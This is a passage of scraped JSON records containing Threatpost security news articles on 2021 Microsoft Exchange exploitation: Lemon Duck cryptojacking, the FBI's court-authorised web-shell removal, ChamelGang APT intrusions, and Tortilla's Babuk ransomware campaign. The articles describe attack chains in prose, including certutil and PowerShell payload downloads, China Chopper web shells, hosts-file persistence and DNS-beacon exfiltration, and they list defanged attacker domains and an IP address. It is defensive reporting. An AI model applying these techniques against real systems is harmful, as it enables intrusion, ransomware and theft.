Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. 
Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. 
The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. 
\u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. 
In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d\n
", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action; in a court-authorized action, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. 
Many enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. \u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors were installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. 
However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Demers said. \u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d\n
", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-01T12:44:45", "description": "A new APT group has emerged that\u2019s specifically targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server\u2019s [ProxyShell](<https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>) and leveraging both new and existing malware to compromise networks.\n\nResearchers at security firm [Positive Technologies](<https://www.ptsecurity.com/ww-en/>) have been tracking the group, dubbed ChamelGang for its chameleon-like capabilities, since March. 
Though attackers mainly have been seen targeting Russian organizations, they have attacked targets in 10 countries so far, researchers said in a [report](<https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/>) by company researchers Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov and Stanislav Rakovsky published online Thursday.\n\nTo avoid detection, ChamelGang hides its malware and network infrastructure under legitimate services of established companies like Microsoft, TrendMicro, McAfee, IBM and Google in a couple of unique ways, researchers observed.\n\nOne is to acquire domains that imitate their legitimate counterparts \u2013 such as newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com and mcafee-upgrade.com. The other is to place SSL certificates that also imitate legitimate ones \u2013 such as github.com, www.ibm.com, jquery.com, update.microsoft-support.net \u2013 on its servers, researchers said.\n\nMoreover, ChamelGang \u2013 like [Nobelium](<https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/>) and [REvil](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) before it \u2013 has hopped on the bandwagon of attacking the supply chain first to gain access to its ultimate target, they said. 
In one of the cases analyzed by Positive Technologies, \u201cthe group compromised a subsidiary and penetrated the target company\u2019s network through it,\u201d according to the writeup.\n\nThe attackers also appear malware-agnostic when it comes to tactics, using both known malicious programs such as [FRP](<https://howtofix.guide/frp-exe-virus/>), [Cobalt Strike Beacon](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), and Tiny Shell, as well as previously unknown malware ProxyT, BeaconLoader and the DoorMe backdoor, researchers said.\n\n## **Two Separate Attacks**\n\nResearchers analyzed two attacks by the novel APT: one in March and one in August. The first investigation was triggered after a Russia-based energy company\u2019s antivirus protection repeatedly reported the presence of the Cobalt Strike Beacon in RAM.\n\nAttackers gained access to the energy company\u2019s network through the supply chain, compromising a vulnerable version of a subsidiary company\u2019s web application on the JBoss Application Server. Upon investigation, researchers found that attackers exploited a critical vulnerability, [CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>), to remotely execute commands on the host.\n\nOnce on the energy company\u2019s network, ChamelGang moved laterally, deploying a number of tools along the way. They included Tiny Shell, with which a UNIX backdoor can receive a shell from an infected host, execute a command and transfer files; an old DLL hijacking technique associated with the Microsoft Distributed Transaction Control (MSDTC) Windows service to gain persistence and escalate privileges; and the Cobalt Strike Beacon for calling back to attackers for additional commands.\n\nResearchers were successful in accessing and exfiltrating data in the attack, researchers said. 
\u201cAfter collecting the data, they placed it on web servers on the compromised network for further downloading \u2026 using the Wget utility,\u201d they wrote.\n\n## **Cutting Short a ProxyShell Attack **\n\nThe second attack was on an organization from the Russian aviation production sector, researchers said. They notified the company four days after the server was compromised, working with employees to eliminate the threat shortly after.\n\n\u201cIn total, the attackers remained in the victim\u2019s network for eight days,\u201d researchers wrote. \u201cAccording to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.\u201d\n\nIn this instance, ChamelGang used a known chain of vulnerabilities in Microsoft Exchange called ProxyShell \u2013 CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 \u2013 to compromise network nodes and gain a foothold. Indeed, a number of attackers took advantage of ProxyShell throughout August, [pummeling](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) unpatched Exchange servers with attacks after a [researcher at BlackHat revealed](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) the attack surface.\n\nOnce on the network, attackers then installed a modified version of the backdoor DoorMe v2 on two Microsoft Exchange mail servers on the victim\u2019s network. Attackers also used BeaconLoader to move inside the network and infect nodes, as well as the Cobalt Strike Beacon.\n\n## **Victims Across the Globe**\n\nFurther threat intelligence following the investigation into attacks on the Russian companies revealed that ChamelGang\u2019s activity has not been limited to that country.\n\nPositive Technologies eventually identified 13 more compromised organizations in nine other countries \u2013 the U.S., Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. 
In the last four countries mentioned, attackers targeted government servers, they added.\n\nAttackers often used ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server against victims, who were all notified by the appropriate national security authorities in their respective countries.\n\nChamelGang\u2019s tendency to reach its targets through the supply chain also is likely one that it \u2013 as well as other APTs \u2013 will continue, given the success attackers have had so far with this tactic, researchers added. \u201cNew APT groups using this method to achieve their goals will appear on stage,\u201d they said.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-01T12:36:25", "type": "threatpost", "title": "New APT ChamelGang Targets Russian Energy, Aviation Orgs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", 
"CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-01T12:36:25", "id": "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "href": "https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T16:00:33", "description": "A new-ish threat actor sometimes known as \u201cTortilla\u201d is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time with the aim of inflicting vulnerable servers with variants of the Babuk ransomware.\n\nCisco Talos researchers said in a Wednesday [report](<https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) that they spotted the malicious campaign a few weeks ago, on Oct. 12.\n\nTortilla, an actor that\u2019s been operating since July, is predominantly targeting U.S. victims. It\u2019s also hurling a smaller number of infections that have hit machines in the Brazil, Finland, Germany, Honduras, Thailand, Ukraine and the U.K., as shown on the map below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg>)\n\nVictim distribution map. 
Source: Cisco Talos.\n\nPrior to this ransomware-inflicting campaign, Tortilla has been experimenting with other payloads, such as the PowerShell-based netcat clone PowerCat.\n\nPowerCat has a penchant for Windows, the researchers explained, being \u201cknown to provide attackers with unauthorized access to Windows machines.\u201d\n\n## ProxyShell\u2019s New Attack Surface\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. 
August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\nIn this latest ProxyShell campaign, Cisco Talos researchers said that the threat actor is using \u201ca somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl\u201d to deliver Babuk.\n\nThey continued: \u201cThe intermediate unpacking stage is downloaded and decoded in memory before the final payload embedded within the original sample is decrypted and executed.\u201d\n\n## Who\u2019s Babuk?\n\nBabuk is a ransomware that\u2019s probably best known for its starring role in a breach of the Washington D.C. police force [in April](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). The gang behind the malware has a short history, having only been [identified in 2021](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>), but that history shows that it\u2019s a [double-extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) player: one that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.\n\nThat tactic has worked. 
As [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>) described in February, Babuk the ransomware had already been lobbed at a batch of at least five big enterprises, with one score: The gang walked away with $85,000 after one of those targets ponied up the money, McAfee researchers said.\n\nIts victims have included Serco, an outsourcing firm that confirmed that it had been [slammed](<https://www.computerweekly.com/news/252495684/Serco-confirms-Babuk-ransomware-attack>) with a double-extortion ransomware attack in late January.\n\nLike many ransomware strains, Babuk is ruthless: It not only encrypts a victim\u2019s machine, it also [blows up backups](<https://threatpost.com/conti-ransomware-backups/175114/>) and deletes the volume shadow copies, Cisco Talos said.\n\n## What\u2019s Under Babuk\u2019s Hood\n\nOn the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware and software platforms.\n\nIt\u2019s mostly compiled for Windows and ARM for Linux, but researchers said that, over time, they\u2019ve also seen versions for ESX and a 32-bit, old PE executable.\n\nIn this recent October campaign though, the threat actors are specifically targeting Windows.\n\n## China Chopper Chops Again\n\nPart of the infection chain involves China Chopper: A webshell that dates back to 2010 but which has [clung to relevancy since](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), including reportedly being used in a massive 2019 attack against telecommunications providers called [Operation Soft Cell](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>). 
The webshell enables attackers to \u201cretain access to an infected system using a client-side application which contains all the logic required to control the target,\u201d as Cisco Talos [described](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) the webshell in 2019.\n\nThis time around, it\u2019s being used to get to Exchange Server systems. \u201cWe assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,\u201d according to the Cisco Talos writeup.\n\n## The Infection Chain\n\nAs shown in the infection flow chart below, the actors are using either a DLL or .NET executable to kick things off on the targeted system. \u201cThe initial .NET executable module runs as a child process of w3wp.exe and invokes the command shell to run an obfuscated PowerShell command,\u201d according to Cisco Talos\u2019 report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg>)\n\nInfection flow chart. Source: Cisco Talos.\n\n\u201cThe PowerShell command invokes a web request and downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund and xxxs[.]info, or the IP address 185[.]219[.]52[.]229,\u201d researchers said.\n\n\u201cThe payload loader downloads an intermediate unpacking stage from the PasteBin clone site pastebin.pl,\u201d they continued \u2013 a site that \u201cseems to be unrelated to the popular pastebin.com.\u201d\n\nThey continued: \u201cThe unpacker concatenates the bitmap images embedded in the resource section of the trojan and decrypts the payload into the memory. 
The payload is injected into the process AddInProcess32 and is used to encrypt files on the victim\u2019s server and all mounted drives.\u201d\n\n## More Ingredients in Tortilla\u2019s Infrastructure\n\nBesides the pastebin.pl site that hosts Tortilla\u2019s intermediate unpacker code, Tortilla\u2019s infrastructure also includes a Unix-based download server.\n\nThe site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the [AgentTesla trojan](<https://threatpost.com/agent-tesla-microsoft-asmi/163581/>) and the [FormBook malware dropper.](<https://threatpost.com/new-formbook-dropper-harbors-persistence/145614/>)\n\n## Babuk\u2019s Code Spill Helps Newbies\n\nIn July, Babuk gang\u2019s source code and builder were spilled: They were [uploaded to VirusTotal](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>), making it available to all security vendors and competitors. That leak has helped the ransomware spread to even an inexperienced, green group like Tortilla, Cisco Talos said.\n\nThe leak \u201cmay have encouraged new malicious actors to manipulate and deploy the malware,\u201d researchers noted.\n\n\u201cThis actor has only been operating since early July this year and has been experimenting with different payloads, apparently in order to obtain and maintain remote access to the infected systems,\u201d according to its writeup.\n\nWith Babuk source code readily available, all the Tortilla actors have to know is how to tweak it a tad, researchers said: A scenario that observers predicted back when the code appeared.\n\n\u201cThe actor displays low to medium skills with a decent understanding of the security concepts and the ability to create minor modifications to existing malware and offensive security tools,\u201d Cisco Talos researchers said in assessing the Tortilla gang.\n\n## Decryptor Won\u2019t Work on Variant\n\nWhile a free [Babuk decryptor was 
released](<https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/>) last week, it won\u2019t work on the Babuk variant seen in this campaign, according to the writeup: \u201cUnfortunately, it is only effective on files encrypted with a number of leaked keys and cannot be used to decrypt files encrypted by the variant described in this blog post.\u201d\n\n## How to Keep Exchange Safe\n\nTortilla is hosting malicious modules and conducting internet-wide scanning to exploit vulnerable hosts.\n\nThe researchers recommended staying vigilant, staying on top of any infection in its early stages and implementing a layered defense security, \u201cwith the behavioral protection enabled for endpoints and servers to detect the threats at an early stage of the infection chain.\u201d\n\nThey also recommended keeping servers and apps updated so as to squash vulnerabilities, such as the trio of CVEs exploited in the ProxyShell attacks.\n\nAlso, keep an eye out for backup demolition, as the code deletes shadow copies: \u201cBabuk ransomware is nefarious by its nature and while it encrypts the victim\u2019s machine, it interrupts the system backup process and deletes the volume shadow copies,\u201d according to Cisco Talos.\n\nOn top of all that, bolster detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, according to Cisco Talos.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-03T18:16:37", "type": "threatpost", "title": "\u2018Tortilla\u2019 Wraps Exchange Servers in ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-43267"], "modified": "2021-11-03T18:16:37", "id": "THREATPOST:52923238811C7BFD39E0529C85317249", "href": "https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T19:26:48", "description": "Researchers\u2019 Microsoft Exchange server honeypots are being actively exploited via ProxyShell: The name of an attack disclosed at Black Hat last week that chains three vulnerabilities to enable unauthenticated attackers to perform remote code execution (RCE) and snag plaintext passwords.\n\nIn his Black Hat [presentation](<https://www.blackhat.com/us-21/briefings/schedule/#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-m>) last week, Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) said that a survey shows more than 400,000 Exchange servers on the internet that are exposed to the attack via port 443. 
